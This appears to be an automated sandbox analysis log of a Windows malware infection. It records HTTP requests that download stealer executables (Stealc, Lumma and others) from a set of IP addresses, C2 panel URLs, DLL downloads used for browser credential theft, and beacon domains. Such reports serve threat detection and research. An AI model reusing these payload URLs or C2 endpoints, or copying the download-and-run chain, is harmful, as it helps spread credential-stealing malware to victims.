Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: reinforcenh.shop
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: ballotnwu.site

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.117
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.117

Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe

Code function: 16_2_0019A879 SetCurrentDirectoryA,GetUserNameA,CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,GetLocalTime,CoUninitialize,CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,CreateFileA,InternetOpenA,InternetOpenUrlA,InternetReadFile,WriteFile,WriteFile,InternetReadFile,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,RemoveDirectoryA,

16_2_0019A879

Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /inc/gold.exe HTTP/1.1Host: 185.215.113.117
Source: global traffic	HTTP traffic detected: GET /12dsvc.exe HTTP/1.1Host: 194.116.215.195
Source: global traffic	HTTP traffic detected: GET /Nework.exe HTTP/1.1Host: 185.215.113.26
Source: global traffic	HTTP traffic detected: GET /inc/stealc_default2.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.17Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /thebig/stories.exe HTTP/1.1Host: 176.113.115.95
Source: global traffic	HTTP traffic detected: GET /inc/needmoney.exe HTTP/1.1Host: 185.215.113.117
Source: global traffic	HTTP traffic detected: GET /f1ddeb6592c03206/sqlite3.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /inc/penis.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /inc/crypted.exe HTTP/1.1Host: 185.215.113.117
Source: global traffic	HTTP traffic detected: GET /f1ddeb6592c03206/freebl3.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /f1ddeb6592c03206/mozglue.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /f1ddeb6592c03206/msvcp140.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /inc/LummaC222222.exe HTTP/1.1Host: 185.215.113.117
Source: global traffic	HTTP traffic detected: GET /f1ddeb6592c03206/nss3.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /f1ddeb6592c03206/softokn3.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /f1ddeb6592c03206/vcruntime140.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /inc/newbundle2.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /inc/rstxdhuj.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 91.202.233.158Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /inc/cccc2.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.103
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.103
Source: global traffic	HTTP traffic detected: GET /inc/neon.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.103
Source: global traffic	HTTP traffic detected: GET /soka/random.exe HTTP/1.1Host: 185.215.113.16

Source: penis.exe, 00000018.00000002.2884267791.0000000002FDF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $]q3IndexedDB\https_www.youtube.com_0.indexeddb.leveldb@\]q equals www.youtube.com (Youtube)
Source: penis.exe, 00000018.00000002.2884267791.0000000002FDF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: IndexedDB\https_www.youtube.com_0.indexeddb.leveldb equals www.youtube.com (Youtube)
Source: penis.exe, 00000018.00000002.2884267791.0000000002FDF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: IndexedDB\https_www.youtube.com_0.indexeddb.leveldb@\]q equals www.youtube.com (Youtube)
Source: penis.exe, 00000018.00000002.2884267791.0000000002FDF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: IndexedDB\https_www.youtube.com_0.indexeddb.leveldb`,]q equals www.youtube.com (Youtube)
Source: penis.exe, 00000018.00000002.2884267791.0000000002FDF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: `,]q#www.youtube.com_0.indexeddb.leveldb equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: google.com
Source: global traffic	DNS traffic detected: DNS query: drawzhotdog.shop
Source: global traffic	DNS traffic detected: DNS query: gutterydhowi.shop
Source: global traffic	DNS traffic detected: DNS query: ghostreedmnu.shop
Source: global traffic	DNS traffic detected: DNS query: offensivedzvju.shop
Source: global traffic	DNS traffic detected: DNS query: vozmeatillu.shop
Source: global traffic	DNS traffic detected: DNS query: fragnantbui.shop
Source: global traffic	DNS traffic detected: DNS query: stogeneratmns.shop
Source: global traffic	DNS traffic detected: DNS query: reinforcenh.shop
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: ballotnwu.site
Source: global traffic	DNS traffic detected: DNS query: youtube.com
Source: global traffic	DNS traffic detected: DNS query: www.youtube.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: drawzhotdog.shop

Source: Hkbsse.exe, 00000012.00000002.3336638317.00000000007D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.95/thebig/stories.exe
Source: Hkbsse.exe, 00000012.00000002.3336638317.00000000007F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.95/thebig/stories.exe-1W
Source: Hkbsse.exe, 00000012.00000002.3336638317.00000000007F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.95/thebig/stories.exe11
Source: Hkbsse.exe, 00000012.00000002.3336638317.00000000007D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.95/thebig/stories.exeD
Source: Hkbsse.exe, 00000012.00000002.3336638317.00000000007D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.95/thebig/stories.exeebf0fv
Source: axplong.exe, 00000006.00000003.3138607330.000000000162D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.103/mine/random.exe
Source: axplong.exe, 00000006.00000003.3054813558.000000000162D000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3138607330.000000000162D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.103/steam/random.exe
Source: axplong.exe, 00000006.00000003.3054813558.000000000162D000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3138607330.000000000162D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.117/inc/LummaC222222.exe
Source: axplong.exe, 00000006.00000003.3054813558.000000000162D000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3138607330.000000000162D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.117/inc/LummaC222222.exeY5
Source: axplong.exe, 00000006.00000003.3054813558.000000000162D000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3138607330.000000000162D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.117/inc/crypted.exe
Source: axplong.exe, 00000006.00000003.3054813558.000000000162D000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3138607330.000000000162D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.117/inc/crypted.exel&
Source: axplong.exe, 00000006.00000003.3054813558.000000000162D000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3138607330.000000000162D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.117/inc/needmoney.exe
Source: axplong.exe, 00000006.00000003.3054813558.000000000162D000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3138607330.000000000162D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.117/inc/needmoney.exeu5n
Source: axplong.exe, 00000006.00000003.3054813558.0000000001671000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3138607330.0000000001671000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3054813558.0000000001620000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3140584868.000000000167D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php
Source: axplong.exe, 00000006.00000003.3054813558.0000000001671000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phph
Source: axplong.exe, 00000006.00000003.3054813558.000000000162D000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3138607330.000000000162D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/inc/cccc2.exeF
Source: axplong.exe, 00000006.00000003.3054813558.000000000162D000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3138607330.000000000162D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/inc/cccc2.exeL
Source: axplong.exe, 00000006.00000003.2999105107.0000000001658000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/inc/cccc2.exelF
Source: axplong.exe, 00000006.00000003.3138607330.000000000162D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/inc/neon.exe
Source: axplong.exe, 00000006.00000003.3054813558.000000000162D000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3138607330.000000000162D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/inc/newbundle2.exe
Source: axplong.exe, 00000006.00000003.2999105107.0000000001671000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3054813558.0000000001671000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3138607330.0000000001671000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3140584868.000000000167D000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.2999421029.0000000001677000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/inc/newbundle2.exe5
Source: axplong.exe, 00000006.00000003.3054813558.000000000162D000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3138607330.000000000162D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/inc/newbundle2.exeU:
Source: axplong.exe, 00000006.00000003.3054813558.000000000162D000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3138607330.000000000162D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/inc/penis.exe
Source: axplong.exe, 00000006.00000003.3054813558.000000000162D000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3138607330.000000000162D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/inc/rstxdhuj.exe
Source: axplong.exe, 00000006.00000003.3054813558.000000000162D000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3138607330.000000000162D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/inc/rstxdhuj.exez&
Source: axplong.exe, 00000006.00000003.3054813558.000000000162D000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3138607330.000000000162D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/inc/stealc_default2.exeG
Source: axplong.exe, 00000006.00000003.3054813558.000000000162D000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3138607330.000000000162D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/inc/stealc_default2.exei
Source: stealc_default2.exe, 00000013.00000002.2994583849.000000000079E000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000013.00000002.2996721656.0000000000F8C000.00000004.00000001.01000000.00000012.sdmp, stealc_default2.exe, 00000013.00000002.2996721656.00000000010FD000.00000004.00000001.01000000.00000012.sdmp	String found in binary or memory: http://185.215.113.17
Source: stealc_default2.exe, 00000013.00000002.2994583849.000000000079E000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000013.00000002.2994583849.00000000007EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/
Source: stealc_default2.exe, 00000013.00000002.2994583849.00000000007C9000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000013.00000002.2996721656.00000000010FD000.00000004.00000001.01000000.00000012.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.php
Source: stealc_default2.exe, 00000013.00000002.2994583849.00000000007EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.php3
Source: stealc_default2.exe, 00000013.00000002.2994583849.00000000007C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.php4
Source: stealc_default2.exe, 00000013.00000002.2994583849.0000000000805000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phpbird
Source: stealc_default2.exe, 00000013.00000002.2994583849.000000000079E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phpf
Source: stealc_default2.exe, 00000013.00000002.2994583849.0000000000805000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phpinomi
Source: stealc_default2.exe, 00000013.00000002.2994583849.00000000007C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phpp
Source: stealc_default2.exe, 00000013.00000002.2996721656.00000000010FD000.00000004.00000001.01000000.00000012.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phption:
Source: stealc_default2.exe, 00000013.00000002.2994583849.0000000000805000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phpwser
Source: stealc_default2.exe, 00000013.00000002.2994583849.00000000007EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/freebl3.dll
Source: stealc_default2.exe, 00000013.00000002.2994583849.00000000007EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/mozglue.dll
Source: stealc_default2.exe, 00000013.00000002.2994583849.00000000007EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/msvcp140.dllfaHD
Source: stealc_default2.exe, 00000013.00000002.2994583849.00000000007EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/msvcp140.dllpaFD
Source: stealc_default2.exe, 00000013.00000002.2994583849.00000000007CF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/nss3.dll
Source: stealc_default2.exe, 00000013.00000002.2994583849.00000000007CF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/nss3.dllq&
Source: stealc_default2.exe, 00000013.00000002.2994583849.00000000007EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/softokn3.dll
Source: stealc_default2.exe, 00000013.00000002.2994583849.00000000007EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/softokn3.dllJa
Source: stealc_default2.exe, 00000013.00000002.2994583849.00000000007EA000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000013.00000002.2996721656.0000000000FBA000.00000004.00000001.01000000.00000012.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/sqlite3.dll
Source: stealc_default2.exe, 00000013.00000002.2994583849.00000000007EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/vcruntime140.dll
Source: stealc_default2.exe, 00000013.00000002.2994583849.00000000007EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/oj
Source: stealc_default2.exe, 00000013.00000002.2996721656.00000000010FD000.00000004.00000001.01000000.00000012.sdmp	String found in binary or memory: http://185.215.113.172fb6c2cc8dce150a.phption:
Source: Hkbsse.exe, 00000012.00000002.3336638317.00000000007F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.26/
Source: Hkbsse.exe, 00000012.00000002.3336638317.00000000007F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.26/15.113.26/y
Source: Hkbsse.exe, 00000012.00000002.3336638317.00000000007F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.26/3405117-2476756634-1003
Source: Hkbsse.exe, 00000012.00000002.3336638317.00000000007F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.26/6122658-3693405117-2476756634-1003
Source: Hkbsse.exe, 00000012.00000002.3336638317.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000012.00000002.3336638317.0000000000798000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.26/Dem7kTu/index.php
Source: Hkbsse.exe, 00000012.00000002.3336638317.0000000000806000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.26/Dem7kTu/index.php6
Source: Hkbsse.exe, 00000012.00000002.3336638317.0000000000806000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.26/Dem7kTu/index.php65001
Source: Hkbsse.exe, 00000012.00000002.3336638317.0000000000806000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.26/Dem7kTu/index.phpE
Source: Hkbsse.exe, 00000012.00000002.3336638317.0000000000806000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.26/Dem7kTu/index.phpG
Source: Hkbsse.exe, 00000012.00000002.3336638317.0000000000806000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.26/Dem7kTu/index.phpK
Source: Hkbsse.exe, 00000012.00000002.3336638317.0000000000806000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.26/Dem7kTu/index.phpM
Source: Hkbsse.exe, 00000012.00000002.3336638317.0000000000806000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.26/Dem7kTu/index.phpPROFILE=user-PCUSg
Source: Hkbsse.exe, 00000012.00000002.3336638317.0000000000806000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.26/Dem7kTu/index.phpQ
Source: Hkbsse.exe, 00000012.00000002.3336638317.0000000000806000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.26/Dem7kTu/index.phpW
Source: Hkbsse.exe, 00000012.00000002.3336638317.0000000000806000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.26/Dem7kTu/index.phpWindows
Source: Hkbsse.exe, 00000012.00000002.3336638317.0000000000806000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.26/Dem7kTu/index.phpWindows_NTPath=C:
Source: Hkbsse.exe, 00000012.00000002.3336638317.00000000007D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.26/Dem7kTu/index.phpY
Source: Hkbsse.exe, 00000012.00000002.3336638317.0000000000806000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.26/Dem7kTu/index.php_
Source: Hkbsse.exe, 00000012.00000002.3336638317.0000000000806000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.26/Dem7kTu/index.phph
Source: Hkbsse.exe, 00000012.00000002.3336638317.0000000000806000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.26/Dem7kTu/index.phpjavapath;C:
Source: Hkbsse.exe, 00000012.00000002.3336638317.0000000000806000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.26/Dem7kTu/index.phplfons
Source: Hkbsse.exe, 00000012.00000002.3336638317.0000000000806000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.26/Dem7kTu/index.phps
Source: Hkbsse.exe, 00000012.00000002.3336638317.0000000000806000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.26/Dem7kTu/index.phptoIt3
Source: Hkbsse.exe, 00000012.00000002.3336638317.0000000000806000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.26/Dem7kTu/index.phpy
Source: axplong.exe, 00000006.00000003.3054813558.000000000162D000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3138607330.000000000162D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.26/Nework.exeX
Source: axplong.exe, 00000006.00000003.3054813558.000000000162D000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3138607330.000000000162D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.26/Nework.exep
Source: Hkbsse.exe, 00000012.00000002.3336638317.00000000007F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.26/ferences.SourceAumid
Source: Hkbsse.exe, 00000012.00000002.3336638317.00000000007F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.26/lfons
Source: Hkbsse.exe, 00000012.00000002.3336638317.00000000007F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.26/rage.Streams.DataWriter
Source: axplong.exe, 00000006.00000003.3054813558.000000000162D000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3138607330.000000000162D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://194.116.215.195/12dsvc.exe
Source: svchost015.exe, 00000020.00000002.3006538986.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/e96ea2db21fa9a1b.php
Source: needmoney.exe, 00000016.00000002.2960319681.0000000002E10000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.cer0Q
Source: needmoney.exe, 00000016.00000002.2960319681.0000000002E10000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: svchost.exe, 0000001A.00000002.3344988955.0000019DEAC00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: needmoney.exe, 00000016.00000002.2960319681.0000000002E10000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.crl0
Source: needmoney.exe, 00000016.00000002.2960319681.0000000002E10000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
Source: needmoney.exe, 00000016.00000002.2960319681.0000000002E10000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
